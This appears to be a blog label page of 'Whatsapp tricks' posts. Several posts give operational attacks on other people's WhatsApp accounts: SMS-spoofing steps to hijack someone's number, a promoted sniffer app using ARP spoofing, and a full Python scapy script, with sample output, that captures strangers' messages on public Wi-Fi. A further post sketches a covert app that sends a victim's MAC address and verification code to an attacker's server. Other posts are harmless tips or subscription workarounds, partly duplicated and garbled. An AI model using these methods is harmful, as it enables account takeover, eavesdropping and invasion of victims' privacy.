Showing posts with label Whatsapp tricks. Show all posts
Hijack & Hack WhatsApp In Easy Steps
Hijack (someone else’s) Whatsapp with your iPhone
If you want to hijack someone else’s Whatsapp and receive messages addressed to that person with your iPhone, read on. (You don’t have an iPhone? see bottom)When you install Whatsapp on your iPhone, the Whatsapp application makes contact with the Whatsapp servers, and the Whatsapp servers will send you a verification sms with a code in it. Straight from that point a counter will start counting in the Whatsapp application. Within this time Whatsapp expects you to receive your verification SMS. If this period expires Whatsapp offers you several other authentication methods. (see below)
What you’re going to do next is called SMS-spoofing. You can do this via many sites on the web. Choose one, and make up your fake SMS as shown in the picture below:
From: +(Country code)(mobile number)
Message: (your email address)
That’s all! Within minutes you will receive the activation code in your email to activate whatsapp on your iPhone with someone else’s Telephone number, and from that moment on you will receive message’s addressed to that person on your iPhone.
The only way for Whatsapp to solve this issue is sending the verification SMS from their own servers and no other way.
If you have anything other than an iPhone your also able to Hijack someone else’s Whatsapp. It’s even easier for you.
All other systems will start sending an SMS verification immediately from your own mobile phone! So you disconnect your mobile phone, try to send the verification sms, which is impossible since you disconnected it. Check your outbox. There you will see the verification sms. Copy that whole sms to a website where you can spoof SMS. State the FROM field as the person’s Whatsapp you want to hijack, and fill in your own mobile number in the TO field.
Thats it.
Read More »
Labels:
Whatsapp tricks
How To Hack Whatsapp [Tutorial] - Whatsapp Sniffing App
TUTORIAL TO HACK WHATSAPP USING SNIFFER TOOL
Read More »
Labels:
Whatsapp tricks
Whatsapp Sniffing App - Hack, Cheat, Trick, Tip
WHATSAPP SNIFFER FOR ANDROID
Description:
WhatsAppSniffer is a tool for root terminals to read WhatsApp conversations of a WIFI network (Open, WEP, WPA/WPA2). It captures the conversations, pictures / videos and coordinates that are sent or received by an Android phone, iPhone or Nokia on the same WIFI network. It has not been tested with Windows Phone terminals. It can't read the messages written or received by the BlackBerry's, as they use their own servers and not WhatsApp's.
This application is designed to demonstrate that the security of WhatsApp's communications is null. WhatsAppSniffer just use the TCPDump program which reads all the WIFI network packets and filters those which has origin or destination WhatsApp's servers. All messages are in plain text, so it does not decrypt anything, complying fully with the legal terms of WhatsApp (3.C: "While we do not disallow the use of sniffers Such as Ethereal, tcpdump or HttpWatch in general, Any we do going efforts to disallow reverse-engineer our system, our protocols, or explore outside the boundaries of the ordinary requests made by clients WhatsApp .... ")
For WPA/WPA2 encrypted networks, if uses the tool ARPSpoof (optional).
Features:
- REQUIRES ROOT
- For now, there is only support for this characters:
a-zA-Z0-9:-()!¡¿?ñÑáéíóúüÁÉÍÓÚÜçÇ/
- Read conversations outgoing and incoming to Android, iPhone and Nokia phones.
- They are separated by phone number
- Notify when a message has been captured
- Ability to start a debug session saving all logs
- It matches phone numbers captured with agenda for coincidences
Free version
- Ads
- You can only read the first three conversations
- You can not delete conversations
***************** Known Bugs ***********************
Sometimes when you start the sniffer, your internet connection may end. To fix this, stop the program, stop WIFI and start WIFI again.
-If you activate the ARPSpoof in a very large network, the network can go slow or we can leave without Internet to everybody else.
****************************************************
Legal Terms
WhatsAppSniffer comes with absolutely no warranty. You use this software on your own risk. The developer is not responsible for any damages caused by WhatsAppSniffer or it´s usage. It´s only the users responsibility to check his countrys laws in order to make sure that the usage of WhatsAppSniffer is permitted by law in his country. In some countries stealing someones conversations might be prohibited by law. Always think about what you´re doing! Stealing someones conversations can cause real trouble for him and maybe for you.
keywords: whatsapp, sniffer, capture, read conversations, conversation, tcpdump, arpspoof, spy, root **
Read More »
Labels:
Whatsapp tricks
How to hack WhatsApp Messenger on Nokia, iPhone & Android
WhatsApp is a cross-platform messing application used by smartphones. It allows users to communicate instant messages and share media via 3G or WiFi with other users on the platform. Back in may 2011 WhatsApp had a security breach when hackers realized that messages were being transmitted unencrypted via plain text which left accounts open for hi-jacking. WhatsApp finally released a security update for this problem and the system became locked down.
REQUIREMENTS:
- 7Zip – Click here to download
- A Windows Computer (Windows XP, Vista, Win 7, Win 8)
- A Phone running WhatsApp (iPhone, Android, Nokia, Blackberry etc)
Please upgrade your browser
In this article i will talk about alternative methods of hi-jacking
WhatsApp messages and other protocols using a variety of methods.
The first hack im going to talk about will spoof WhatsApp and have it
think you are somebody else allowing you to communicate under an
alternative name. This hack works by tricking the WhatsApp Verification
Servers by sending a spoofed request for an authorisation code intended
for an alternative phone. This method is also known to work on several
other IM applications based on iOS, Symbian & Android devices.Hack 1
Install WhatsApp on your deviceWhatsApp now starts a counter where it sends a verification message to its servers. If this verification fails after a specific time then WhatsApp offers alternative methods of verification. A message can be blocked by changing the message center number or pushing the phone into Airplane mode.
WhatsApp now offers an alternative method of verification
Choose verify through SMS and fill in your email address. Once you click to send the SMS click cancel to terminate the call for authorisation to the WhatsApp server.
Next we need to do some SMS-Spoofing
There are numerous ways of doing this for free. A quick google search will pull up a vast amount of services which can spoof email addresses.
If you are using an iPhone use the following details in the SMS spoofer application.
To: +447900347295
From: +(Country code)(mobile number)
Message: (your email address)
If you are using another device then check your outbox and copy the message details into the spoofer application and send the spoofed verification.
You will now receive messages intended for the spoofed number on your mobile device and you can communicate with people under the spoofed number.Hack 2
The second attack I’m going to talk about is a little bit more professional. For users who can pull of MITM (Man in the Middle) Attacks this is a sure way to rake in data from a public network. I came across the script at the 0×80 blog so i I tried it on several public networks in Dublin (thanks to the karma code). The amount of data you can pull in from people sitting around you in a short amount of time is quite unreal. The code is written in Python so its nice and simple to work with and edit to make it work for similar chat applications.You will also need to parse the traffic so check this link: http://www.secdev.org/projects/scapy/
Before you have a look at the code you may want to note that WhatsApp blurts out even more information for us to see. Doing a MITM Attack and peeking at the packets we can see that WhatsApp prints the mobile number and the name of the user your target is speaking with. This is important to note this because this data can be used for some social engineering (calling the person to pull more information from them) or by checking web resources such as Facebook or LinkedIn to find their address, email accounts, websites and what ever else your hunting for.
Example
DYN:~/whatsapp# python sniffer.py wlan0
#########################
## whatsapp sniff v0.1 ##
#########################
[+] Interface : wlan0
[+] filter : tcp port 5222
To : ***********
Msg : Hello, I will send you a file.
To : **********
Filename : .jpg
URL : https://mms*.whatsapp.net/a1/0/1/2/3/*md5hash*.jpg
From : ***********
Msg : Thanks file has been recieved, take this file too.
From : ***********
Filename : .jpg
URL : https://mms*.whatsapp.net/a2/0/2/3/1/*md5hash*.jpg
Code
#!/usr/bin/env python
import os
import sys
import scapy.all
import re
Previous_Msg = ""
Previous_Filename = ""
Files = []
Messages = []
Urls = []
def banner():
print "#########################"
print "## whatsapp sniff v0.1 ##"
print "## qnix@0x80.org ##"
print "#########################\n"
def whatsapp_parse(packet):
global Previous_Msg
global Previous_Filename
global Files
global Messages
global Urls
src = packet.sprintf("%IP.src%")
dst = packet.sprintf("%IP.dst%")
sport = packet.sprintf("%IP.sport%")
dport = packet.sprintf("%IP.dport%")
raw = packet.sprintf("%Raw.load%")
# Target Sending stuff
if dport == "5222":
Filename = ""
toNumber = ""
Url = ""
Msg = ""
try:
toNumber = re.sub("\D", "", raw)
if(toNumber[5:16].startswith("0")): toNumber = toNumber[6:17]
else: toNumber = toNumber[5:16]
try:
Filename = raw.split("file\\xfc")[1][1:37]
Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
except:pass
try: Msg = raw.split("\\xf8\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
except:pass
except: pass
if(len(toNumber) >= 10):
if(len(Msg) >= 1 and Previous_Msg != Msg):
Previous_Msg = Msg
print "To : ", toNumber
print "Msg : ", Msg
Messages.append(Msg)
elif(len(Filename) >= 1 and Previous_Filename != Filename):
Previous_Filename = Filename
print "To : ", toNumber
print "Filename : ", Filename
print "URL : ", Url
Files.append(Filename)
Urls.append(Url)
# Recieved Messages
if sport == "5222":
Msg = ""
fromNumber = ""
Url = ""
Filename = ""
try:
fromNumber = re.sub("\D", "", raw)
if(fromNumber[5:16].startswith("0")): fromNumber = fromNumber[6:17]
else: fromNumber = fromNumber[5:16]
try:
Filename = raw.split("file\\xfc")[1][1:37]
Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
except: pass
try: Msg = raw.split("\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
except: pass
except:pass
if(len(fromNumber) = 1 and Previous_Msg != Msg):
Previous_Msg = Msg
print "From : ", fromNumber
print "Msg : ", Msg
Messages.append(Msg)
elif(len(Filename) >= 1 and Previous_Filename != Filename):
Previous_Filename = Filename
print "From : ", fromNumber
print "Filename : ", Filename
print "URL : ", Url
Files.append(Filename)
Urls.append(Url)
def callback(packet):
sport = packet.sprintf("%IP.sport%")
dport = packet.sprintf("%IP.dport%")
raw = packet.sprintf("%Raw.load%")
if raw != '??':
if dport == "5222" or sport == "5222":
whatsapp_parse(packet)
def main():
banner()
if(len(sys.argv) != 2):
print "%s " % sys.argv[0]
sys.exit(1)
scapy.iface = sys.argv[1]
scapy.verb = 0
scapy.promisc = 0
expr = "tcp port 5222"
print "[+] Interface : ", scapy.iface
print "[+] filter : ", expr
scapy.all.sniff(filter=expr, prn=callback, store=0)
print "[+] iface %s" % scapy.iface
if __name__ == "__main__":
main()
Read More »
Labels:
Whatsapp tricks
2 Ways To Get WhatsApp Subscription For Free
Get Free Subscription of WhatsApp With Easy Steps-
Last months there are rumors that Whatsapp for Google Android would become for payment. But, there square measure some rumors talking concerning alternatives to avoid paying for the annual subscription.
Whatsapp is certain really the foremost fashionable instant electronic messaging for smartphones. ordinarily we will realize any smartphone user with this app put in. The strategy of the corporate has been to present humanoid users a free electronic messaging app. partially this has been potential as a result of the corporate behind the project has offered the service in check mode for over a year. However, the actual fact that several users, particularly with humanoid, didn’t notice that a subscription is needed is that the corporate has enlarged step by step and singly this period of time till a couple of months agone.
Transition amount paid subscription free
From that moment echoed some users that the appliance requesting them “renew” your subscription, one thing that has been confirmed formally Barely a couple of days. However, the short time that has served to sight some ways to continue enjoying free Whatsapp services.
Methods to create it:
Last months there are rumors that Whatsapp for Google Android would become for payment. But, there square measure some rumors talking concerning alternatives to avoid paying for the annual subscription.
Whatsapp is certain really the foremost fashionable instant electronic messaging for smartphones. ordinarily we will realize any smartphone user with this app put in. The strategy of the corporate has been to present humanoid users a free electronic messaging app. partially this has been potential as a result of the corporate behind the project has offered the service in check mode for over a year. However, the actual fact that several users, particularly with humanoid, didn’t notice that a subscription is needed is that the corporate has enlarged step by step and singly this period of time till a couple of months agone.
Transition amount paid subscription free
From that moment echoed some users that the appliance requesting them “renew” your subscription, one thing that has been confirmed formally Barely a couple of days. However, the short time that has served to sight some ways to continue enjoying free Whatsapp services.
Methods to create it:
-
Let the period of time expire Whatsapp.
Thus, the corporate is forced to increase once more the period of time (at least it appears there square measure humanoid users enjoying this option). It appears Whatsapp is preventing users to migrate resolute different alternatives like Spotbros, Line,… so, once the servers sight the inactivity of variety related to associate account of Whatsapp expired , they proceed to revive the free period of time.
-
Associate our signaling to Whatsapp application for iPhone
The most reliable technique is to associate our signaling to Whatsapp application for iPhone (maybe not the simplest possibility however there’s one among them). Thus, the account can get pleasure from the conditions of terminals organized for Apple, that principally goes through a period of time subscription payment for the appliance. Later, once coming into the SIM in another terminal, during this case associate humanoid smartphone, the conditions stay unchanged to our signaling. This technique needs access to associate iPhone, which can involve additional disorder than the annual payment itself Whatsapp service. Still, it’s fascinating for those that will do that. to grasp why this technique ought to indicate that Whatsapp was created at the start for iPhone and repair conditions specified that payment for the appliance concerned the employment of instant electronic messaging network free always.
Read More »
Labels:
Whatsapp tricks
Install Whatsapp on WiFi Only Devices
Whatsapp is an awesome instrument for speaking with associates and
family, also that it is savvy too. The obstacle is that Whatsapp does
not permit clients to instate the application on WiFi just mechanisms,
which is what the majority of us have.
Steps To Follow:
Step 1: First of all go to google play store and find the latest version of Whatsapp. Right away scan for Whatsapp and see if your gadget backings the application or not.
Step 2: If you are using PC access any online APK store, for instance apknew.com to get the last APK variant of Whatsapp and instate it on your machine. Assuming that you can straightforwardly download the APK index on your Android WiFi just apparatus, skip to step 5.
Step 3: Once downloaded, associate your apparatus to the workstation and spot the Whatsapp APK index. Make a partitioned document for APKs on your Android unit for straightforward ID later on.
Step 4: Glue the downloaded APK index of Whatsapp dispatcher in that envelope and detach the mechanism.
Step 5: Right away access the index director on your Android mechanism and find the APK's organizer. From that point spot the Whatsapp delegate document and select it to start establishment.
Step 6: The taking after sprinkle screen will make a request for your consent to give access to fix the provision on the mechanism; press Install to move.
Step 7: The following screen will arouse you when the establishment finishes efficaciously. If not then rehash the technique. Depending on if the introduction misses the mark more than once, download the index again or pick a more advanced in years form provision for your mechanism. At that point press Done to passageway the instatement.
Step 8: Notwithstanding you are primed and you can start the setup of the Whatsapp provision on your unit. Place the requisition from the requisition menu and start the introduction process by tolerating the terms and conditions.
Step 9: The accompanying screen will incite you for your portable number. Include the number, which is not as of now connected or in utilization on a different gadget with the Whatsapp delegate; press Next to move.
Step 10: The requisition will affirm your number; if right, press "OK" or hit "Edit" to make updates and continue.
Step 11: The requisition will now verify your gadget and will send the verification note through SMS to your portable number, i think its very simple. The content holds the verification code that you need to drop in manually. Hold up for the verification technique to complete and you could be moved to the following step programmedly. It will take precisely five minutes.
Step 12: The taking after screen will provoke you to drop in the verification code; drop in the 6 digit code and continue, after that verify it.
Step 13: The application, once initiated, will indicate the number of days worth of aid accessible on your number. Press Continue to move to the talks page and begin informing with your unique mechanism.
Steps To Follow:
Step 1: First of all go to google play store and find the latest version of Whatsapp. Right away scan for Whatsapp and see if your gadget backings the application or not.
Step 2: If you are using PC access any online APK store, for instance apknew.com to get the last APK variant of Whatsapp and instate it on your machine. Assuming that you can straightforwardly download the APK index on your Android WiFi just apparatus, skip to step 5.
Step 3: Once downloaded, associate your apparatus to the workstation and spot the Whatsapp APK index. Make a partitioned document for APKs on your Android unit for straightforward ID later on.
Step 4: Glue the downloaded APK index of Whatsapp dispatcher in that envelope and detach the mechanism.
Step 5: Right away access the index director on your Android mechanism and find the APK's organizer. From that point spot the Whatsapp delegate document and select it to start establishment.
Step 6: The taking after sprinkle screen will make a request for your consent to give access to fix the provision on the mechanism; press Install to move.
Step 7: The following screen will arouse you when the establishment finishes efficaciously. If not then rehash the technique. Depending on if the introduction misses the mark more than once, download the index again or pick a more advanced in years form provision for your mechanism. At that point press Done to passageway the instatement.
Step 8: Notwithstanding you are primed and you can start the setup of the Whatsapp provision on your unit. Place the requisition from the requisition menu and start the introduction process by tolerating the terms and conditions.
Step 9: The accompanying screen will incite you for your portable number. Include the number, which is not as of now connected or in utilization on a different gadget with the Whatsapp delegate; press Next to move.
Step 10: The requisition will affirm your number; if right, press "OK" or hit "Edit" to make updates and continue.
Step 11: The requisition will now verify your gadget and will send the verification note through SMS to your portable number, i think its very simple. The content holds the verification code that you need to drop in manually. Hold up for the verification technique to complete and you could be moved to the following step programmedly. It will take precisely five minutes.
Step 12: The taking after screen will provoke you to drop in the verification code; drop in the 6 digit code and continue, after that verify it.
Step 13: The application, once initiated, will indicate the number of days worth of aid accessible on your number. Press Continue to move to the talks page and begin informing with your unique mechanism.
Read More »
Labels:
Whatsapp tricks
HOW TO GET WHATSAPP FREE FOREVER
Last months there have been rumors that Whatsapp for Android would
become for payment. But, there are some rumors talking about
alternatives to avoid paying for the annual subscription.
Whatsapp is sure actually the most popular instant messaging for smartphones. Normally we can find any smartphone user with this app installed. The strategy of the company has been to give Android users a free messaging app. In part this has been possible because the company behind the project has offered the service in test mode for over a year. However, the fact that many users, especially with Android, did not realize that a subscription is required is that the company has expanded gradually and individually this trial period until a few months ago.
Transition period paid subscription free
From that moment echoed some users that the application requesting them “renew” your subscription, something that has been confirmed officially Barely a few days. However, the short time that has served to detect some methods to continue enjoying free Whatsapp services.
Methods to make it:
* Let the trial period expire Whatsapp.
Thus, the company is forced to extend again the trial period (at least it seems there are Android users enjoying this option). It seems Whatsapp is preventing users to migrate out to other alternatives such as Spotbros, Line,… Therefore, once the servers detect the inactivity of a number associated with an account of Whatsapp expired, they proceed to restore the free trial period.
* Associate our phone number to Whatsapp application for iPhone
The most reliable method is to associate our phone number to Whatsapp application for iPhone (maybe not the best option but there is one of them). Thus, the account will enjoy the conditions of terminals arranged for Apple, which mainly goes through a lifetime subscription payment for the application. Later, after entering the SIM in another terminal, in this case an Android smartphone, the conditions remain unchanged to our phone number. This method requires access to an iPhone, which may involve more disorder than the annual payment itself Whatsapp service. Still, it is interesting for those who can do this. To understand why this method should indicate that Whatsapp was created initially for iPhone and service conditions specified that payment for the application involved the use of instant messaging network free for life.
However, I’m going to be honest. In my opinion there is no problem to pay less than one or two dollars to keep running correctly an Android app very useful for me.
Now it’s your choice.
Whatsapp is sure actually the most popular instant messaging for smartphones. Normally we can find any smartphone user with this app installed. The strategy of the company has been to give Android users a free messaging app. In part this has been possible because the company behind the project has offered the service in test mode for over a year. However, the fact that many users, especially with Android, did not realize that a subscription is required is that the company has expanded gradually and individually this trial period until a few months ago.
Transition period paid subscription free
From that moment echoed some users that the application requesting them “renew” your subscription, something that has been confirmed officially Barely a few days. However, the short time that has served to detect some methods to continue enjoying free Whatsapp services.
Methods to make it:
* Let the trial period expire Whatsapp.
Thus, the company is forced to extend again the trial period (at least it seems there are Android users enjoying this option). It seems Whatsapp is preventing users to migrate out to other alternatives such as Spotbros, Line,… Therefore, once the servers detect the inactivity of a number associated with an account of Whatsapp expired, they proceed to restore the free trial period.
* Associate our phone number to Whatsapp application for iPhone
The most reliable method is to associate our phone number to Whatsapp application for iPhone (maybe not the best option but there is one of them). Thus, the account will enjoy the conditions of terminals arranged for Apple, which mainly goes through a lifetime subscription payment for the application. Later, after entering the SIM in another terminal, in this case an Android smartphone, the conditions remain unchanged to our phone number. This method requires access to an iPhone, which may involve more disorder than the annual payment itself Whatsapp service. Still, it is interesting for those who can do this. To understand why this method should indicate that Whatsapp was created initially for iPhone and service conditions specified that payment for the application involved the use of instant messaging network free for life.
However, I’m going to be honest. In my opinion there is no problem to pay less than one or two dollars to keep running correctly an Android app very useful for me.
Now it’s your choice.
Read More »
Labels:
Whatsapp tricks
TRICK TO USE Whatsapp ON WINDOWS COMPUTERS
Whatsapp
is a popular messaging service that we all know.With whatsapp we can
send text msg,images,audio clip and many more with free of cost(if your
net skim is activated). This app is also available for all popular
operating platform.
Today I am going to tell you how to use whatsapp in your windows computer.This trick is based on BlueStack app player.
What you have to do is:
1.Download BlueStack app Player for download and more info about BlueStack Click Here.
2.After the download install and open it.(its look like similar as in picture)
3.Now Click on right navigate button to
see the "More App" icon.after the clicking it will take you in browser
windows Log in to website then it ask you to download "Cloud Connect
app" in your android app.This app will help us in sync android device
with this app player.
4.after that install cloud connect
android app in your device from the application store.after that it will
ask a Pin which you got in previous step.enter the code and your app
will be automatically sync with app player.Or you can manually tick app
into it(you must have transfer the whatsapp application)
5.After the adding of whatsapp reinitialise whatsapp same method(verification code and all that) as per device.
You done Enjoy Whatsapp on windows OS.This method is little bit long but at last its amazing.
NOTE: Whatapp is not active on more than one device hence you have to remove it from your mobile or register using other number.
Source-http://www.itrickers.com
Read More »
Labels:
Whatsapp tricks
Whatsapp Trick to Hide Your "Last Seen" or "Online" Status
Whatsapp doesn't deserve any introduction as its
take place of SMSs. All of us use whatsapp everyday some of reason are quick
and effective response, totally add free application, better group interaction
and many more. Apple user have to purchase this app for lifetime use but this
is not same for android user, for androiders they have subscription plan for
year or more (free for first year). As this app get high demand there are many
tricks and tools for modifies some feature of this application.
When you open whatsapp your online time is saved by
application and it will appear on your profile through other user account. so
basically what you have to do
Today I am going to give you a trick to Disable
"Last Seen" or "Online" status.
Many times you feel like someone is watching you
through "Last Seen" or you want to appear offline to avoid someone.
So here is a trick to freeze your "Last Seen" status. There are two
method follow by step.
Last Seen Timestamp [Official]
This feature is available only for Apple users.
There is no confirmation for android version but this is very needy feature so it has more chances to get update in future.
- Go to Whatsapp setting→Chat Settings→Advanced→(Turn off) Last Seen Timestamp
Now on no one can trace your Last Seen time. This
feature take 24hr to give effect and also take 24hr to toggle it back.
Note that no one can trace your Last Seen but if
you are online then it will appear as "Online" so this is a
limitation of this method.
Manage Your Data Connection
This trick is working on all platform but not
flexible for all.In this you have to manage your data plan turn it on and off
in right time. Let me explain
- Disable your data or any other net connection using toggle shortcut menu or anything else.
- Now open whatsapp read message, write message, or do anything.
- After it exit Whatsapp completely also from background
- Enable your data plan or your net connection
That’s it!!!...you done, by doing this your Last
Seen time is not update. Practically this is tricky and lengthy process for
sending message.
However there are many app available to do it for
you. Some of it listed below
Read More »
Labels:
Whatsapp tricks
STEPS TO HACK WHATSAPP
Many of my friends were like "Dude u on whatsapp?".
I got that question from many of my friends. So finally decided to download "whatsapp".
Even u guys should try it out, if u haven't tried it yet!
So i have been using this app from past 3 days, and i got value idea about how it works and how it authenticates You as You.
If you people would have observed -
1. You can read all the messages Offline o.O
2. You can access all d profile pictures offline.
But Whatsapp encrypts all d DATA. But guys "hold on". Obviously it can be decrypted or any other way to access all d messages..
"" There's always a way "" :D
Here what 'm going to talk about is not just getting there messages which can be accessed offline.
'll add that with video or screenshot in my next post :p
The method which i thought about when i was writing my "exams in coll 2day" is interesting..
And YA while writing exam.. Lol :D Cant help it ...
That's ME :p
Enough of Stories and background on whatsapp and Myself :p
Lets Get into Tech stuff
Its theoretical because i haven't tried it.
I'll try it and post with video or screenshots s00n :-)
Ohk guys, lets get busy
So if you people have observed you can not have your whatsapp account
logged in in two devices. Means session is given to only 1 mac address.
If the MAC [ Media Access Control ] address of the device requesting access changes then whatsapp asks you to re-verify your account!
And common, "whatsapp people" you think Mac address cant be spoofed. But yeah Nice try whatsapp developer's :p
So here d point you will have to get access to the phone to get
the victims phone "MAC address + the verifying massage" which is
received to verify your device.
Simple you code a app to get the user's MAC address and checking the
message from whats app in the victims inbox. Very easy in case of
android devices.
As soon the message s received Push the "MAC address" + "Verifying code"
to your server or mail it your ID. That depends on your convince.
That's it guys.
Spoof your phone's MAC address to your Victims address and install whatsapp and type the "verify code".
And done guys. You get complete access to the victims whatsapp ID..
where as you can keep spying/watching your victims movements :D
i.e 2 people - U + ur victim are using the same ID from different devices.
i.e 2 people - U + ur victim are using the same ID from different devices.
But its very LAME to spy on other people's private messages. So try not to.
This article is just an theoretical approach and only for understanding and knowledge purpose.
And 'm not responsible for any thing you do after reading this post :D :p
I have no clue up-to which extent the approach will work.
Any ways Thanks for reading this post.
Hope you people enjoyed it..
Read More »
Labels:
Whatsapp tricks
How to Hack WhatsApp Messenger | Build WhatsApp API Client
 |
Smartphones taking large part of our daily life, IM services like Whatsapp, iMessage, BBM, etc have emerged to be exchanging more messages every second. WhatsApp delivers more than 1 billion messages per day, but yet, its the most insecure way of communication.
As per a recent security analysis, WhatsApp is totally insecure way of communicating with friends.
WhatsApp Encryption
You will be surprised to know that until August 2012, messages sent through the WhatsApp service were not encrypted in any way, everything was sent in plaintext. That means if you were using Whatsapp on a public wifi, everything can be captured by anyone else sniffing ont he wireless network. The latest WhatsApp uses encryption but its this new encryption is broken. But still, phone number is sent out in plaintext.The local storage isn’t any different, you can checkout WhatsApp Database Encryption Project Report
WhatsApp API & Reverse Engineering
If you know XMPP, the same protocol used by facebook, GTalk, and several others, you can try your hands-on WhatsAPI, an API for WhatsApp messenger.WhatsApp uses customized XMPP server with proprietary extensions, named internally as FunXMPP.
1. WhatsApp Authentication / Login Mechanism
Just like any other XMPP, WhatsApp uses jabber id and password to login. The password is hashed, stored in servers upon account creation and used transparently everytime the client connects the server.
Its an incredibly horrible implementation. As researcher found out, the username is the user’s phone number – an attacker would probably already knows the victim’s number.
On Android, the password is a md5 hash of the reversed IMEI number:
$imei = "112222223333334"; // example IMEI
$androidWhatsAppPassword = md5(strrev($imei)); // reverse IMEI and calculate md5 hash
On iOS, the password is generated from the devices WLAN MAC address:
$wlanMAC = "AA:BB:CC:DD:EE:FF"; // example WLAN MAC address
$iphoneWhatsAppPassword = md5($wlanMAC.$wlanMAC); // calculate md5 hash using the MAC address twice
Both IMEI and MAC address are easily retrievable from devices if you
have physical access to it. MAC address is much easier to capture as you
can sniff on the wireless network to which iOS device is connected.The JID is a concatenation between your country’s code and mobile number.
Initial login uses Digest Access Authentication. You can try this for yourself:
https://r.whatsapp.net/v1/exist.php?
cc=$countrycode&in=$phonenumber&udid=$password
$countrycode = the country calling code
$phonenumber = the users phone number
(without the country calling code)
$password = see above, for iPhone use md5($wlanMAC.$wlanMAC),
for Android use md5(strrev($imei))
The response you would receive would be in XML, containing messages designated for your phone.2. Text Message communication
Messages are basically sent as TCP packets, following WhatsApp’s own format (unlike what’s defined in XMPP RFCs).
Photos, Videos and Audio files shared with WhatsApp contacts are HTTP-uploaded to a server before being sent to the recipient(s) along with Base64 thumbnail of media file (if applicable) along with the generated HTTP link as the message body.
WhatsApp Privacy Leak
WhatsApp shares your contacts with the server, we all know that. But the way it is done is ridiculously insecure. It basically sends contact information as:https://sro.whatsapp.net/client/iphone/iq.php
?cd=1&cc=$countrycode&me=$yournumber&u[]=$friend1
&u[]=$friend2&u[]=$friend3&u[]=$friend4
The server response looks like:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><array><dict><key>P</key><string>1234567890</string><key>T</key><integer>10817</integer><key>S</key><string>Some Status Message</string><key>JID</key><string>23xxxxxxxxx</string><key>NP</key><true/></dict></array></plist>
Read More »
Labels:
Whatsapp tricks
Steps to Get WhatsApp Subscription for 10 Years
Steps to Get WhatsApp Subscription for 10 Years !
1. First you need to Delete you WhatsApp Account from your Phone.
2. now you will need to look for a Friend or Anyone who has Apple Iphone or Ipad Any Version it may be
3. Then you need to Register WhatsApp with your Number on his Iphone or Ipad.
4. Now After entering you Number on Iphone/Ipad, you will get a Verification code on your Mobile, Just Check your inbox, and Enter the Verification code on Iphone/Ipad
5. After these Steps WhatsApp will load and Start on Iphone, just Check WhatsApp Account and it will have Paid Subscription will 2022.
Now Final Step: By this You have got Paid WhatsApp Subscription till 10 years.
Now you Simple Need to Delete your Account from Iphone/Ipad. and Simply Then downlaod the WhatsApp on Any Device which it supports and Enter your Number then verify It. you will see you have got 10 Years of WhatsApp Free
1. First you need to Delete you WhatsApp Account from your Phone.
2. now you will need to look for a Friend or Anyone who has Apple Iphone or Ipad Any Version it may be
3. Then you need to Register WhatsApp with your Number on his Iphone or Ipad.
4. Now After entering you Number on Iphone/Ipad, you will get a Verification code on your Mobile, Just Check your inbox, and Enter the Verification code on Iphone/Ipad
5. After these Steps WhatsApp will load and Start on Iphone, just Check WhatsApp Account and it will have Paid Subscription will 2022.
Now Final Step: By this You have got Paid WhatsApp Subscription till 10 years.
Now you Simple Need to Delete your Account from Iphone/Ipad. and Simply Then downlaod the WhatsApp on Any Device which it supports and Enter your Number then verify It. you will see you have got 10 Years of WhatsApp Free
Read More »
Labels:
Whatsapp tricks
Whatsapp Hack
I have heard that whatsapp is not encrypted ( its an app like viber) and
that when you sign up for a number hte code is generated within your
phone sent to whatssapp servers and then sent to you. because it is not
encrpted you can intercept it from your phone I have been trying to
figure it out for days saw many links, does anyone have any advice ?
here are two posts I found on the internet that might help. They used to
have this thing where all you had to do was put your phone in airplane
mode and the activation code would be in your outbox not sent, but that
wont work anymore.
A few weeks ago I also tried to look a little bit into WhatsApp but had to give up because of my final exams at school.
I used the Symbian S40 Client and decompiled the .jar you can find via google to look a little bit into it.
I'm not a programmer but had done some "Hello World" stuff on Java before so I tried to understand a little bit what is going on in the Client. (In the following work I always pretended to be an Nokia C3-00 just that you know when it appears i.e. in the User-Agent)
I don't know if it's helpful for you but I will try to share the things I found out by looking into the code even though I can't gurantee they are right:
The first thing is the login-Name and the password needed to login:
Matching with reports from some other threads here and in other forums the login name I found was some sort of:
Code:
international area code without the 0's or + in the beginning + phone number without the first 0 + @s.whatsapp.net
For example if you live in germany and having the phone number 017612345 it would be 4917612345@s.whatsapp.net -> 0049 for germany without the 0's and the phone number without the 0.
The Password is set during the registration process but usually it is an transformation of the IMEI of your phone (in case you don't want to stand out you should also do it like this). I must admit I don't exactly know how this transormation works but I have the code that does it.
I just wrapped it _very dirty_ in a standalone Java program to test it. source: http://pastebin.com/npbwcj1s
I really don't know what it exactly does and didn't look deeper into it but it isn't a "real" md5 I think... (Maybe someone who knows how to create an MD5 in Java can look at it what is different except the reverse of the imei?)
The second thing I searched for is the registration process.
With this I got so far that I got an Registration-Code and I also get the response from the Server that the account exists but I can't login because I hadn't enough time to look excatly at the login process. Just logging in via XAMPP in Pidgin doesn't work expectedly
The registration process works this way: (no gurantee that it is right and don't try it with your "real" number. I tried it with an old SIM I had lying around)
0) All these API-Request are done with an User-Agent like:
Code:
WhatsApp/2.1.0 S40Version/04.60 Device/nokiac3-00
The Code generating this is: http://pastebin.com/K79wrfnS
I used information I found in the web to fill the information for the Nokia C3-00.
As said by the pw: I don't think you really have to fake it to look like this but it maybe makes it harder to find you.
1) The first step ist requesting the Registration-code from the Server (the Code you get i.e. via SMS)
The API-call looks like this:
Code:
https://r.whatsapp.n...0000&method=sms
The Arguments are as following:
cc = area code without 0's
in = number without first 0
to = number where the sms or call should go to (maybe security weakness?)
lc/lg = Language-Code(?) splittet up - e.g. DE_de goes to lc=DE&lg=de US_en would be lc=US&lg=en
mcc/mnc/imsi = Should be the "Mobile Country Code", "Mobile Network Code" and the "Mobile Subscriber Identification Number"
-> I don't know how to get to them and the App has as "fallback" just the 0's in it when the system-request for them fails so it should work with the 0's (and it does)
The metod is maybe the most interesting thing.
There are 3 methods: self, sms and voice
